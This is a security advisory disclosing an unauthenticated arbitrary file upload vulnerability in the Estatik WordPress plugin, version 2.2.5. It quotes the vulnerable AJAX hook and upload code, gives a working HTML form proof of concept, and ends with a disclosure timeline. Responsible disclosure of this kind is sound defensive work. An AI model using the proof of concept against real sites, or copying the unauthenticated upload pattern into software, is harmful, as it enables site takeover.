Arbitrary File Upload Vulnerability in Estatik
As we continue to review old third-party data on hacking attempts to identity more vulnerabilities that hackers have likely already discovered in WordPress plugins we spotted an arbitrary file upload vulnerability in the plugin Estatik.
Back in June of last year a request was made for the file /wp-content/plugins/estatik/front_templates/css/es_front_responsive.css, for what was likely a probe for usage of the plugin before exploiting it. Looking over that plugin for any obvious issues we found that in the current version of it, 2.2.5, a file upload capability is accessible without being logged, despite only being intended to be accessed by users logged in as Administrators.
The issue starts with the function es_prop_media_images() being made accessible through WordPress AJAX functionality to those not logged in (in the file /admin_template/es_property/es_property_functions.php):
231 | add_action('wp_ajax_nopriv_es_prop_media_images', 'es_prop_media_images'); |
In that function the following code saves an uploaded file sent with a request to the AJAX function
131 132 133 134 135 136 137 | $image_name = time()."_".$_FILES['es_media_images']['name'][$i]; $sourcePath = $_FILES['es_media_images']['tmp_name'][$i]; $targetPath = $upload_dir['path']."/".$image_name; move_uploaded_file($sourcePath,$targetPath) ; |
Proof of Concept
The following proof of concept will upload the selected file and put it in the current month’s directory inside of the /wp-content/uploads/ directory. The name of the file in the upload directory with be the time the file was saved as output by the function time() followed by a “_” and then name of the as it was uploaded.
Make sure to replace “[path to WordPress]” with the location of WordPress.
<html> <body> <form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST" enctype="multipart/form-data"> <input type="hidden" name="action" value="es_prop_media_images" /> <input type="file" name="es_media_images[]" /> <input type="submit" value="Submit" /> </form> </body> </html>
Timeline
- 7/25/2016 – Developer notified.
- 8/1/2016 – WordPress.org Plugin Directory notified.
- 8/1/2016 – WordPres.org Plugin Directory removes plugin.
- Week of 8/14/2016 – Version 2.3.0 released, which fixes vulnerability, but leaves a lesser vulnerability.
Pingback: August 2016 WordPress Core, Plugins & Themes Vulnerabilities